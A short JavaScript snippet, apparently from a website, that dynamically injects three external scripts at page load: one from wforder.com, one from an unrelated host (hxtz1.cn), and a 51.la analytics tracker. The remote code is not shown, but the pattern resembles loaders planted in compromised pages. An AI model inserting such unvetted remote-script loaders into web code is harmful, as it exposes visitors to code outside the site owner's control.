document.write('<script src="//www.wforder.com/public/wfnews.js"></'+'script>');
new_element=document.createElement("script");
new_element.setAttribute("type","text/javascript");
new_element.setAttribute("src","http://gcb.hxtz1.cn/nojue/nojue.js");
document.body.appendChild(new_element);
new_element=document.createElement("script");
new_element.setAttribute("language","javascript");
new_element.setAttribute("type","text/javascript");
new_element.setAttribute("src","//js.users.51.la/19342824.js");
document.body.appendChild(new_element);